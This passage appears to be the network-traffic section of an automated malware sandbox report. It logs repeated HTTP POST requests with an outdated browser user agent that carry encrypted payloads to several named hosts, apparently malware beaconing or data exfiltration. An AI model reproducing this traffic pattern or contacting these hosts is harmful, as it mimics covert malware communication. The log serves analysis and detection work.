37 32 46 53 30 71 65 42 2b 75 68 6c 65 73 39 54 32 30 74 41 36 55 4e 33 5a 68 34 54 6b 58 77 68 57 5a 7a 71 31 42 51 78 4e 64 54 45 71 65 50 65 41 70 74 6f 6f 70 4d 69 57 6d 50 41 37 71 66 70 6f 38 65 68 55 74 69 6f 55 4e 59 75 52 67 6d 5a 5a 31 43 75 69 4c 6e 33 5a 75 4a 58 46 44 2b 65 61 63 42 4a 73 4e 4e 46 6f 63 6c 7a 4f 70 62 36 4b 36 4c 78 41 55 33 31 52 43 50 76 4e 49 66 7a 46 61 30 58 41 68 75 61 6f 38 75 4d 50 56 78 56 6d 4f 2f 46 34 36 44 71 6c 69 34 30 53 4b 59 46 55 4a 59 30 48 67 67 4a 42 6c 58 4c 52 59 53 69 6f 58 38 62 4d 53 50 39 62 53 67 72 2b 66 42 4a 51 59 61 63 6f 34 42 34 39 71 55 52 51 2b 62 53 4c 61 72 50 62 4d 2b 36 57 2f 44 4f 66 78 6c 46 76 65 52 6d 4b 46 57 6f 68 55 74 49 39 56 4b 63 68 4c 76 44 70 55 61 58 76 34 35 6e 45 61 31 6b 55 6c 44 71 37 4d 4d 5a 6b 38 71 4f 76 51 39 43 4f 4c 6d 75 57 4a 58 71 6b 6a 2b 4e 2f 6a 75 77 51 31 4d 70 36 79 71 2f 53 32 71 52 47 57 75 47 71 59 62 50 72 50 4e 33 45 56 2f 54 42 54 59 41 66 4e 43 79 6f 76 38 72 57 34 42 35 47 6e 64 51 77 49 42 66 4c 32 66 4e 54 49 6e 6e 49 73 39 62 32 70 4c 36 58 64 76 56 56 58 75 53 68 71 42 36 6e 67 6c 4e 44 4b 45 59 49 2b 52 42 6e 79 4c 4c 39 44 52 30 33 47 61 71 59 7a 64 39 53 66 57 38 33 67 55 61 67 4f 53 78 66 74 43 69 66 4b 34 51 58 4a 65 6a 6c 66 64 5a 6b 4a 37 47 6e 42 46 42 72 77 74 42 35 34 58 4a 32 6e 41 48 5a 44 35 39 65 39 58 67 51 39 52 56 62 38 58 37 57 6b 34 67 38 4e 30 71 62 37 43 53 4b 30 31 73 50 45 31 6e 67 43 79 Data Ascii: Gc6lJiOMmmOO/rHhqgOJjkxCW19JjTS3B+yBAbibvX4Kcr5M6tInAexix5z1D1m9qilorluNxIpEZF0WdgnbuXRS/jUCbA4mtmNjjeVQYMKv672FS0qeB+uhles9T20tA6UN3Zh4TkXwhWZzq1BQxNdTEqePeAptoopMiWmPA7qfpo8ehUtioUNYuRgmZZ1CuiLn3ZuJXFD+eacBJsNNFoclzOpb6K6LxAU31RCPvNIfzFa0XAhuao8uMPVxVmO/F46Dqli40SKYFUJY0HggJBlXLRYSioX8bMSP9bSgr+fBJQYaco4B49qURQ+bSLarPbM+6W/DOfxlFveRmKFWohUtI9VKchLvDpUaXv45nEa1kUlDq7MMZk8qOvQ9COLmuWJXqkj+N/juwQ1Mp6yq/S2qRGWuGqYbPrPN3EV/TBTYAfNCyov8rW4B5GndQwIBfL2fNTInnIs9b2pL6XdvVVXuShqB6nglNDKEYI+RBnyLL9DR03GaqYzd9SfW83gUagOSxftCifK4QXJejlfdZkJ7GnBFBrwtB54XJ2nAHZD59e9XgQ9RVb8X7Wk4g8N0qb7CSK01sPE1ngCy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 5a 78 6e 79 4a 55 36 47 6d 6d 4d 53 71 63 4a 36 32 64 6c 6f 2b 72 48 59 70 76 4e 4f 52 6a 70 79 59 6d 4f 4e 76 51 57 6c 74 33 77 31 73 4f 67 33 45 41 34 76 2f 66 54 36 79 2f 32 63 53 38 72 66 59 76 4f 44 30 4d 79 45 71 39 4c 32 74 65 75 4b 56 4f 54 50 64 47 53 51 79 6b 58 4c 6e 49 4c 46 6e 50 36 63 58 5a 65 53 38 64 74 69 66 46 52 50 6a 79 33 7a 44 2f 6f 4a 62 51 63 34 68 72 4f 6a 4d 6d 36 7a 31 57 4e 31 34 6b 49 47 41 4e 4e 50 4b 53 79 39 36 5a 39 63 54 4a 51 68 38 47 48 6f 4a 66 41 45 7a 2b 38 33 4c 62 36 53 30 57 4d 4b 48 49 43 42 57 4b 67 36 39 44 67 6e 5a 4e 46 35 63 77 57 71 35 70 46 51 61 53 43 48 44 77 54 69 35 2b 67 75 79 2b 36 72 77 62 64 2f 31 61 48 52 30 4f 36 42 62 51 41 68 32 78 44 78 46 45 69 63 4e 78 47 70 71 6d 57 6d 32 37 43 42 2b 79 4d 65 32 4c 61 53 76 70 35 57 67 59 5a 38 48 6c 6e 6c 62 58 46 42 32 37 38 33 47 4d 34 31 57 55 6d 2b 32 79 6d 65 49 38 75 55 45 36 38 33 57 62 56 6d 2f 63 47 55 32 4c 49 6f 78 34 6b 41 62 2f 52 52 53 67 59 4c 73 58 56 36 55 74 65 79 33 48 4d 72 32 62 39 65 73 42 72 44 59 54 31 4f 6b 56 72 45 48 36 79 30 2b 64 4a 4c 48 53 42 64 6a 41 71 61 41 32 68 75 34 59 51 45 5a 50 32 67 66 31 74 74 48 43 5a 70 2b 48 53 47 79 4e 6f 4a 37 57 36 71 52 6e 47 52 64 72 41 56 64 77 7a 55 6a 58 66 6d 73 33 32 7a 64 57 2f 6d 58 64 55 77 73 7a 77 36 4c 6a 30 79 57 66 65 65 6e 73 33 52 79 4e 68 67 70 45 70 69 49 57 63 66 34 43 4b 2b 59 5a 36 79 41 53 71 6d 79 4a 41 67 32 70 73 31 6f 2f 57 42 55 45 46 6b 47 31 50 32 4a 4b 31 46 44 46 4f 72 54 63 7a 74 59 67 64 59 65 52 6c 37 6d 41 4e 31 55 78 70 48 67 4b 43 5a 65 45 66 59 46 73 70 73 5a 4c 5a 6e 61 61 71 72 33 70 42 50 37 75 71 72 65 2f 45 77 4e 53 4e 34 Data Ascii: ZxnyJU6GmmMSqcJ62dlo+rHYpvNORjpyYmONvQWlt3w1sOg3EA4v/fT6y/2cS8rfYvOD0MyEq9L2teuKVOTPdGSQykXLnILFnP6cXZeS8dtifFRPjy3zD/oJbQc4hrOjMm6z1WN14kIGANNPKSy96Z9cTJQh8GHoJfAEz+83Lb6S0WMKHICBWKg69DgnZNF5cwWq5pFQaSCHDwTi5+guy+6rwbd/1aHR0O6BbQAh2xDxFEicNxGpqmWm27CB+yMe2LaSvp5WgYZ8HlnlbXFB2783GM41WUm+2ymeI8uUE683WbVm/cGU2LIox4kAb/RRSgYLsXV6Utey3HMr2b9esBrDYT1OkVrEH6y0+dJLHSBdjAqaA2hu4YQEZP2gf1ttHCZp+HSGyNoJ7W6qRnGRdrAVdwzUjXfms32zdW/mXdUwszw6Lj0yWfeens3RyNhgpEpiIWcf4CK+YZ6yASqmyJAg2ps1o/WBUEFkG1P2JK1FDFOrTcztYgdYeRl7mAN1UxpHgKCZeEfYFspsZLZnaaqr3pBP7uqre/EwNSN4
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 70 79 44 41 49 77 35 30 6d 6d 4d 70 6f 4c 63 35 6d 57 7a 69 4b 6e 48 4d 43 79 38 4f 5a 7a 6c 39 49 68 58 4c 7a 46 6f 51 6e 72 65 68 67 46 66 53 47 37 6a 4a 64 65 59 6a 7a 55 6e 55 49 31 6c 76 71 7a 39 49 68 43 70 74 46 42 42 48 71 70 2f 53 32 57 76 6c 4a 36 73 51 6c 38 41 52 73 54 39 69 69 4b 38 65 57 37 6b 52 61 49 55 2f 63 37 54 2f 55 46 55 48 36 70 4c 2b 56 6d 4c 61 54 59 70 4b 78 56 61 76 51 67 53 5a 4e 76 33 62 38 31 63 62 61 41 72 2f 69 6c 6f 54 47 72 77 69 74 63 5a 45 35 6e 66 4b 57 31 7a 7a 34 46 44 72 79 41 6f 45 6a 34 32 70 47 79 7a 66 7a 52 30 52 62 62 63 47 30 2b 66 6b 5a 73 62 79 30 4f 74 6e 68 56 6f 64 76 67 57 31 39 50 45 58 42 6d 44 62 69 45 4d 59 75 41 68 6a 69 4f 61 58 6c 69 32 4a 47 48 48 6e 49 77 49 7a 44 30 49 33 61 41 45 38 56 5a 76 30 53 2f 54 75 53 48 4b 7a 70 2f 72 74 47 52 78 35 73 50 76 30 41 45 79 43 44 71 39 35 6c 59 38 57 33 52 67 4b 61 77 56 37 52 54 4c 46 33 65 79 68 62 59 37 50 44 30 75 4d 73 43 73 59 46 61 6d 51 59 5a 36 38 56 65 72 2f 6f 32 57 37 77 47 50 53 2b 74 4d 43 76 45 50 38 73 70 47 72 2f 4c 6c 75 32 38 50 61 5a 32 36 74 61 7a 43 48 41 37 6e 63 51 49 67 44 48 4d 4f 34 44 6c 30 4b 4a 6e 79 57 62 73 33 70 64 54 46 71 65 54 76 65 4f 67 43 75 71 77 63 54 36 58 58 55 4b 2b 56 49 32 72 38 6f 49 61 50 55 45 6c 30 49 63 71 38 38 4c 58 41 51 62 30 66 44 67 61 41 61 74 41 51 4a 43 76 76 57 65 58 51 34 37 34 38 64 79 42 71 49 46 46 4e 72 6d 37 48 55 33 7a 56 4b 50 4d 77 73 45 6a 33 5a 6d 65 36 52 48 45 70 2b 7a 36 39 34 72 4e 47 68 68 44 49 46 6d 31 2f 57 75 71 4f 75 58 38 6b 41 68 62 34 58 38 6d 54 55 43 50 64 79 6f 51 7a 56 30 59 32 71 50 54 31 47 62 4f 4b 5a 68 41 55 71 45 49 32 49 37 65 47 78 4c 75 6b 31 54 61 75 2b 46 66 38 74 2f 55 4f 75 4b 4b 64 76 39 4e 47 50 75 39 39 34 30 38 57 78 53 4a 74 65 64 36 68 6b 34 4d 55 54 50 4c 74 37 Data Ascii: pyDAIw50mmMpoLc5mWziKnHMCy8OZzl9IhXLzFoQnrehgFfSG7jJdeYjzUnUI1lvqz9IhCptFBBHqp/S2WvlJ6sQl8ARsT9iiK8eW7kRaIU/c7T/UFUH6pL+VmLaTYpKxVavQgSZNv3b81cbaAr/iloTGrwitcZE5nfKW1zz4FDryAoEj42pGyzfzR0RbbcG0+fkZsby0OtnhVodvgW19PEXBmDbiEMYuAhjiOaXli2JGHHnIwIzD0I3aAE8VZv0S/TuSHKzp/rtGRx5sPv0AEyCDq95lY8W3RgKawV7RTLF3eyhbY7PD0uMsCsYFamQYZ68Ver/o2W7wGPS+tMCvEP8spGr/Llu28PaZ26tazCHA7ncQIgDHMO4Dl0KJnyWbs3pdTFqeTveOgCuqwcT6XXUK+VI2r8oIaPUEl0Icq88LXAQb0fDgaAatAQJCvvWeXQ4748dyBqIFFNrm7HU3zVKPMwsEj3Zme6RHEp+z694rNGhhDIFm1/WuqOuX8kAhb4X8mTUCPdyoQzV0Y2qPT1GbOKZhAUqEI2I7eGxLuk1Tau+Ff8t/UOuKKdv9NGPu99408WxSJted6hk4MUTPLt7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 2f 75 75 36 4a 44 4e 38 6d 6d 50 69 7a 50 6b 7a 65 70 4f 2b 2b 64 78 34 46 6b 32 5a 56 68 77 62 46 78 57 6d 2b 6f 49 47 64 52 4c 38 36 61 61 6b 31 67 77 6c 54 30 63 4e 67 77 6c 30 47 64 6e 4e 55 79 4e 58 4f 34 58 37 51 59 4f 4e 68 6d 58 72 73 56 75 63 5a 6b 41 34 53 6d 51 45 54 38 2b 69 35 38 32 69 77 35 68 35 46 36 58 44 70 6b 6b 41 5a 53 69 58 6f 54 64 6a 58 4a 43 70 7a 6e 73 5a 67 44 6c 70 57 72 4d 6b 36 47 77 7a 38 56 41 47 76 7a 56 79 6b 55 74 36 45 6a 78 79 50 71 72 53 67 5a 73 4b 78 2b 6d 72 56 6b 71 63 62 56 53 61 44 69 6c 61 4a 55 33 61 53 61 65 4d 55 4b 33 5a 7a 54 61 43 7a 76 63 42 44 4b 51 4d 4b 46 76 55 57 55 7a 61 2f 70 54 52 67 54 47 2b 6b 39 72 6b 57 6d 49 43 51 77 62 48 42 64 42 5a 5a 51 2b 57 58 4c 70 32 74 73 2f 58 57 42 79 55 4c 68 65 6e 6b 75 2f 64 59 63 30 49 69 31 79 36 2b 34 53 53 36 66 4e 38 41 2f 50 51 78 73 42 67 6f 49 36 4e 2f 39 35 2f 38 4e 39 51 62 6a 77 46 7a 75 74 74 74 66 49 4a 69 6b 42 61 71 6f 33 6c 6c 74 6e 36 45 74 6f 4c 43 6a 53 45 2f 49 46 30 46 48 72 66 73 53 63 38 6f 67 75 36 67 79 68 68 41 34 30 73 6a 57 66 66 33 66 77 66 48 6e 36 70 32 30 69 58 32 6a 48 75 52 73 64 4d 76 2b 6d 6f 6a 75 5a 42 32 77 43 68 78 46 4f 61 4a 53 34 4f 6f 74 61 53 4d 69 4b 55 6e 47 6a 67 49 55 39 50 37 45 36 68 49 48 68 75 43 58 31 53 53 71 73 53 59 38 7a 2b 53 42 48 77 6e 75 7a 53 51 62 31 54 66 4d 4b 6e 6c 37 4c 7a 43 63 4c 53 4e 35 7a 6a 67 41 31 76 6f 67 6c 6c 48 4f 64 67 56 6d 78 4a 66 62 4c 4b 64 4f 76 6a 6b 73 6c 35 68 47 6e 6c 75 57 37 7a 67 55 6c 62 47 47 42 57 6b 49 69 48 73 78 71 43 69 6e 4b 5a 58 53 32 59 68 34 36 38 33 75 6b 67 69 48 6b 50 4a 44 44 50 75 42 67 38 4c 4d 67 42 5a 62 55 4d 67 46 30 6c 55 2f 47 35 65 50 50 5a 68 69 62 78 41 67 3d 3d Data Ascii: /uu6JDN8mmPizPkzepO++dx4Fk2ZVhwbFxWm+oIGdRL86aak1gwlT0cNgwl0GdnNUyNXO4X7QYONhmXrsVucZkA4SmQET8+i582iw5h5F6XDpkkAZSiXoTdjXJCpznsZgDlpWrMk6Gwz8VAGvzVykUt6EjxyPqrSgZsKx+mrVkqcbVSaDilaJU3aSaeMUK3ZzTaCzvcBDKQMKFvUWUza/pTRgTG+k9rkWmICQwbHBdBZZQ+WXLp2ts/XWByULhenku/dYc0Ii1y6+4SS6fN8A/PQxsBgoI6N/95/8N9QbjwFzutttfIJikBaqo3lltn6EtoLCjSE/IF0FHrfsSc8ogu6gyhhA40sjWff3fwfHn6p20iX2jHuRsdMv+mojuZB2wChxFOaJS4OotaSMiKUnGjgIU9P7E6hIHhuCX1SSqsSY8z+SBHwnuzSQb1TfMKnl7LzCcLSN5zjgA1vogllHOdgVmxJfbLKdOvjksl5hGnluW7zgUlbGGBWkIiHsxqCinKZXS2Yh4683ukgiHkPJDDPuBg8LMgBZbUMgF0lU/G5ePPZhibxAg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 4e 66 63 57 51 54 57 34 6f 32 4e 59 6b 71 30 34 6e 47 78 52 68 43 37 53 4c 2f 50 44 56 32 62 33 4f 64 6a 35 77 78 63 33 4c 75 70 49 78 38 45 42 72 69 38 6e 4d 61 50 30 57 4e 6f 4c 50 62 4a 34 6e 69 44 67 73 46 6d 32 31 7a 69 76 36 35 34 79 58 68 47 33 72 67 79 43 61 44 78 30 53 35 4d 58 66 67 33 33 48 69 4a 31 34 71 38 31 47 62 4a 38 76 69 75 35 37 6c 68 4f 52 4f 6d 70 31 6b 37 47 6b 79 58 4d 45 37 74 76 7a 65 4d 69 36 69 35 57 54 42 47 45 50 37 68 35 47 47 45 6c 35 35 41 59 71 4d 4f 70 68 32 33 63 42 48 68 37 6b 32 46 67 57 6b 79 59 6c 76 37 4f 7a 67 6c 4d 57 70 75 54 6f 75 39 68 61 6e 64 54 45 76 56 55 37 73 41 50 6b 66 6f 34 79 67 76 48 78 32 6c 47 61 79 63 6a 72 69 33 32 4d 4e 6b 66 6b 35 4b 78 51 4e 51 73 49 71 62 71 78 7a 62 63 42 42 66 45 69 4a 58 6a 30 73 6a 38 51 57 45 6e 36 43 43 33 64 77 46 68 4c 70 76 61 47 38 6f 7a 63 41 53 6b 34 38 63 6a 70 53 37 2b 70 38 57 78 66 34 42 73 6b 46 34 41 37 77 63 41 52 39 35 63 34 4e 5a 4f 68 32 76 6c 57 57 61 74 62 6f 66 4d 6f 53 67 31 30 70 35 64 35 4c 67 68 71 45 50 2b 72 71 6e 78 76 52 34 58 67 4e 67 6b 2b 46 48 46 53 36 33 5a 41 6e 52 50 41 4b 30 6b 64 42 33 39 51 6e 71 62 33 66 44 6f 68 34 64 48 74 36 5a 54 38 68 61 6a 4b 6b 4f 74 4e 67 4b 36 50 65 6d 62 4a 56 72 4b 61 39 6d 47 31 30 36 34 65 53 59 32 7a 4c 48 57 49 65 39 78 45 35 35 70 68 53 6a 36 64 6c 65 70 4d 38 5a 38 43 59 5a 32 49 76 53 6b 6e 2b 39 6c 69 6b 4d 59 36 48 76 48 69 67 68 4c 62 48 6c 72 31 59 66 6a 58 65 35 52 2b 54 74 56 67 67 6d 37 6c 68 5a 6a 58 58 32 58 37 69 7a 71 44 32 45 70 45 56 64 30 42 38 53 52 4c 44 45 59 4f 77 4d 43 38 67 45 35 55 68 68 4d 69 35 72 75 67 62 58 61 51 30 66 41 67 6a 4c 47 39 56 44 64 37 70 46 71 4d 6f 4f 56 34 6c 71 52 59 6e 6d 6e 50 5a 59 4d 36 35 46 68 Data Ascii: NfcWQTW4o2NYkq04nGxRhC7SL/PDV2b3Odj5wxc3LupIx8EBri8nMaP0WNoLPbJ4niDgsFm21ziv654yXhG3rgyCaDx0S5MXfg33HiJ14q81GbJ8viu57lhOROmp1k7GkyXME7tvzeMi6i5WTBGEP7h5GGEl55AYqMOph23cBHh7k2FgWkyYlv7OzglMWpuTou9handTEvVU7sAPkfo4ygvHx2lGaycjri32MNkfk5KxQNQsIqbqxzbcBBfEiJXj0sj8QWEn6CC3dwFhLpvaG8ozcASk48cjpS7+p8Wxf4BskF4A7wcAR95c4NZOh2vlWWatbofMoSg10p5d5LghqEP+rqnxvR4XgNgk+FHFS63ZAnRPAK0kdB39Qnqb3fDoh4dHt6ZT8hajKkOtNgK6PembJVrKa9mG1064eSY2zLHWIe9xE55phSj6dlepM8Z8CYZ2IvSkn+9likMY6HvHighLbHlr1YfjXe5R+TtVggm7lhZjXX2X7izqD2EpEVd0B8SRLDEYOwMC8gE5UhhMi5rugbXaQ0fAgjLG9VDd7pFqMoOV4lqRYnmnPZYM65Fh
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 4b 45 2b 4d 59 36 2f 57 70 47 4f 34 39 56 5a 6d 7a 70 52 75 38 4c 6a 45 6b 50 76 46 71 41 63 61 55 33 48 46 65 43 70 63 2f 41 57 4f 6e 7a 36 61 62 31 6f 31 65 72 57 53 38 32 34 66 52 6a 7a 35 31 30 61 6c 34 54 31 76 6e 76 34 34 4e 62 48 61 4d 57 59 46 4b 36 66 4e 72 46 30 44 50 68 78 44 6a 55 37 38 33 68 61 32 53 37 6f 64 65 41 75 36 52 4e 61 6a 65 6c 6f 75 6c 61 45 31 4e 75 48 33 53 76 32 44 67 2b 54 30 52 50 68 63 39 42 46 30 4a 4c 34 50 34 48 57 64 55 68 79 4f 7a 2f 6a 38 77 70 6e 4a 45 6a 39 53 46 4b 36 44 69 77 66 46 35 6c 52 50 34 38 73 4f 6f 6b 6d 48 53 2b 6b 34 69 47 62 65 55 2b 38 74 74 55 59 77 44 4b 62 48 7a 55 36 64 4b 4d 6b 4b 46 6f 35 7a 4a 43 62 2f 71 68 49 61 74 39 6a 62 6f 37 4a 45 74 49 44 37 70 53 59 58 31 51 79 61 39 6c 2f 42 64 76 4c 66 61 4e 37 41 6d 55 6d 30 36 41 45 55 53 44 39 53 55 44 45 39 57 4c 48 74 53 32 4f 78 6c 66 49 52 72 6d 39 55 6f 7a 4a 37 41 4f 71 6d 57 52 42 37 6e 74 4c 53 4f 53 70 71 32 45 72 70 62 63 79 59 44 55 72 73 30 6b 6f 37 70 69 6b 2f 4a 39 55 69 53 49 59 2b 53 47 38 4a 54 55 7a 2b 52 52 32 44 44 77 71 39 4e 4a 38 43 59 53 63 6b 66 74 65 41 41 71 47 56 6f 59 43 4e 52 36 49 31 4d 34 31 41 56 35 7a 63 64 55 63 67 76 48 4b 46 47 35 50 78 5a 42 6a 70 73 62 45 54 53 49 42 65 58 31 4d 74 77 4f 4d 6c 73 74 52 52 37 73 32 65 4e 46 6d 72 6b 52 47 64 2f 43 56 37 45 64 71 39 6d 75 6f 4c 4e 50 67 6e 49 30 2f 44 6a 77 59 4d 43 64 67 78 4f 6b 59 2f 2f 7a 37 49 6c 55 74 4e 50 50 4c 7a 74 31 51 49 32 64 33 72 36 49 47 78 55 5a 67 6f 53 30 70 31 30 4b 36 67 70 6c 71 55 33 2f 58 6c 43 58 4b 43 77 62 31 44 47 32 65 4c 35 2f 4b 77 54 56 2f 51 4b 77 6c 73 36 55 76 66 42 53 71 31 70 56 59 46 6a 59 79 47 47 4c 47 59 6a 43 4f 68 76 71 53 77 64 4f 47 42 36 4f 34 65 34 33 51 58 4b 41 3d 3d Data Ascii: KE+MY6/WpGO49VZmzpRu8LjEkPvFqAcaU3HFeCpc/AWOnz6ab1o1erWS824fRjz510al4T1vnv44NbHaMWYFK6fNrF0DPhxDjU783ha2S7odeAu6RNajeloulaE1NuH3Sv2Dg+T0RPhc9BF0JL4P4HWdUhyOz/j8wpnJEj9SFK6DiwfF5lRP48sOokmHS+k4iGbeU+8ttUYwDKbHzU6dKMkKFo5zJCb/qhIat9jbo7JEtID7pSYX1Qya9l/BdvLfaN7AmUm06AEUSD9SUDE9WLHtS2OxlfIRrm9UozJ7AOqmWRB7ntLSOSpq2ErpbcyYDUrs0ko7pik/J9UiSIY+SG8JTUz+RR2DDwq9NJ8CYSckfteAAqGVoYCNR6I1M41AV5zcdUcgvHKFG5PxZBjpsbETSIBeX1MtwOMlstRR7s2eNFmrkRGd/CV7Edq9muoLNPgnI0/DjwYMCdgxOkY//z7IlUtNPPLzt1QI2d3r6IGxUZgoS0p10K6gplqU3/XlCXKCwb1DG2eL5/KwTV/QKwls6UvfBSq1pVYFjYyGGLGYjCOhvqSwdOGB6O4e43QXKA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 4b 70 34 44 65 6e 57 52 70 57 4d 43 71 59 47 48 33 50 51 34 65 47 34 35 65 2b 51 44 57 6a 61 2b 65 65 31 4f 58 36 56 73 67 73 4e 34 35 56 6e 57 34 4c 41 33 53 4f 66 30 62 4b 65 68 63 52 6f 30 6b 4a 56 54 58 72 65 50 52 48 6b 69 44 4a 30 39 37 62 71 51 53 61 41 55 69 46 32 30 53 62 67 49 42 71 6e 4d 54 69 6f 4c 55 53 31 44 37 54 31 42 70 71 36 5a 73 73 52 47 57 47 70 6a 47 65 33 34 79 43 34 48 57 31 4b 6c 4e 74 56 4f 42 66 61 67 38 6f 7a 79 50 62 70 76 42 6c 71 37 32 72 57 6c 72 4d 75 62 65 55 6a 7a 62 73 47 62 56 66 2b 64 75 64 76 47 42 6f 4c 68 6f 6b 74 64 6f 44 4f 53 55 73 37 4d 77 39 2f 64 6d 38 44 74 57 77 35 47 69 76 66 4e 6e 66 75 34 54 38 67 72 2b 57 67 72 36 6d 55 69 49 65 42 54 6e 65 6c 47 6a 42 4d 42 47 70 74 50 79 32 44 34 61 78 38 2b 6d 67 4a 54 53 55 49 58 68 67 4f 6c 56 50 52 67 32 6d 6b 42 75 5a 68 6c 30 51 6e 30 6f 30 6f 6c 47 6a 67 72 50 65 39 75 43 56 30 42 51 57 67 4e 72 4d 58 79 62 4a 34 75 45 37 64 47 30 73 2f 49 71 57 39 71 6c 61 7a 41 68 39 6f 61 6b 4b 61 59 52 2b 56 59 56 4f 72 64 38 77 41 58 72 64 4d 6a 51 33 45 64 61 39 63 37 33 32 44 55 61 76 4e 78 41 66 38 6a 6b 2b 6e 68 55 2b 66 39 30 43 47 57 31 37 62 6a 6a 4e 68 31 67 30 43 30 7a 65 47 68 50 57 51 72 4a 56 33 77 69 6f 41 48 58 38 58 49 77 30 75 51 4d 4d 6e 33 75 6f 2f 35 4a 56 70 35 62 4e 42 34 66 38 56 33 67 65 31 63 35 4e 4d 39 78 53 4f 4d 46 2b 6b 63 65 42 4c 62 4e 66 30 46 74 2b 41 4f 5a 77 68 43 62 30 4d 6f 61 69 69 69 35 65 6c 69 39 38 6c 66 6b 69 72 59 30 62 4c 70 64 75 4f 53 47 6b 55 73 58 77 73 47 32 57 4f 45 45 64 55 6a 55 30 6d 73 4c 68 52 64 32 75 73 71 54 63 7a 39 68 72 63 61 2f 79 79 4b 69 70 66 4e 52 74 68 34 65 41 34 36 34 7a 72 45 62 55 4c 63 47 56 47 2b 6b 44 55 45 42 67 6b 77 7a 42 36 67 37 74 38 4a 58 43 44 76 Data Ascii: Kp4DenWRpWMCqYGH3PQ4eG45e+QDWja+ee1OX6VsgsN45VnW4LA3SOf0bKehcRo0kJVTXrePRHkiDJ097bqQSaAUiF20SbgIBqnMTioLUS1D7T1Bpq6ZssRGWGpjGe34yC4HW1KlNtVOBfag8ozyPbpvBlq72rWlrMubeUjzbsGbVf+dudvGBoLhoktdoDOSUs7Mw9/dm8DtWw5GivfNnfu4T8gr+Wgr6mUiIeBTnelGjBMBGptPy2D4ax8+mgJTSUIXhgOlVPRg2mkBuZhl0Qn0o0olGjgrPe9uCV0BQWgNrMXybJ4uE7dG0s/IqW9qlazAh9oakKaYR+VYVOrd8wAXrdMjQ3Eda9c732DUavNxAf8jk+nhU+f90CGW17bjjNh1g0C0zeGhPWQrJV3wioAHX8XIw0uQMMn3uo/5JVp5bNB4f8V3ge1c5NM9xSOMF+kceBLbNf0Ft+AOZwhCb0Moaiii5eli98lfkirY0bLpduOSGkUsXwsG2WOEEdUjU0msLhRd2usqTcz9hrca/yyKipfNRth4eA464zrEbULcGVG+kDUEBgkwzB6g7t8JXCDv
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 4b 45 2b 4d 59 36 2f 57 70 47 4f 34 39 56 5a 6d 7a 70 52 75 38 4c 6a 45 6b 50 76 46 71 41 63 61 55 33 48 46 65 43 70 63 2f 41 57 4f 6e 7a 36 61 62 31 6f 31 65 72 57 53 38 32 34 66 52 6a 7a 35 31 30 61 6c 34 54 31 76 6e 76 34 34 4e 62 48 61 4d 57 59 46 4b 36 66 4e 72 46 30 44 50 68 78 44 6a 55 37 38 33 68 61 32 53 37 6f 64 65 41 75 36 52 4e 61 6a 65 6c 6f 75 6c 61 45 31 4e 75 48 33 53 76 32 44 67 2b 54 30 52 50 68 63 39 42 46 30 4a 4c 34 50 34 48 57 64 55 68 79 4f 7a 2f 6a 38 77 70 6e 4a 45 6a 39 53 46 4b 36 44 69 77 66 46 35 6c 52 50 34 38 73 4f 6f 6b 6d 48 53 2b 6b 34 69 47 62 65 55 2b 38 74 74 55 59 77 44 4b 62 48 7a 55 36 64 4b 4d 6b 4b 46 6f 35 7a 4a 43 62 2f 71 68 49 61 74 39 6a 62 6f 37 4a 45 74 49 44 37 70 53 59 58 31 51 79 61 39 6c 2f 42 64 76 4c 66 61 4e 37 41 6d 55 6d 30 36 41 45 55 53 44 39 53 55 44 45 39 57 4c 48 74 53 32 4f 78 6c 66 49 52 72 6d 39 55 6f 7a 4a 37 41 4f 71 6d 57 52 42 37 6e 74 4c 53 4f 53 70 71 32 45 72 70 62 63 79 59 44 55 72 73 30 6b 6f 37 70 69 6b 2f 4a 39 55 69 53 49 59 2b 53 47 38 4a 54 55 7a 2b 52 52 32 44 44 77 71 39 4e 4a 38 43 59 53 63 6b 66 74 65 41 41 71 47 56 6f 59 43 4e 52 36 49 31 4d 34 31 41 56 35 7a 63 64 55 63 67 76 48 4b 46 47 35 50 78 5a 42 6a 70 73 62 45 54 53 49 42 65 58 31 4d 74 77 4f 4d 6c 73 74 52 52 37 73 32 65 4e 46 6d 72 6b 52 47 64 2f 43 56 37 45 64 71 39 6d 75 6f 4c 4e 50 67 6e 49 30 2f 44 6a 77 59 4d 43 64 67 78 4f 6b 59 2f 2f 7a 37 49 6c 55 74 4e 50 50 4c 7a 74 31 51 49 32 64 33 72 36 49 47 78 55 5a 67 6f 53 30 70 31 30 4b 36 67 70 6c 71 55 33 2f 58 6c 43 58 4b 43 77 62 31 44 47 32 65 4c 35 2f 4b 77 54 56 2f 51 4b 77 6c 73 36 55 76 66 42 53 71 31 70 56 59 46 6a 59 79 47 47 4c 47 59 6a 43 4f 68 76 71 53 77 64 4f 47 42 36 4f 34 65 34 33 51 58 4b 41 3d 3d 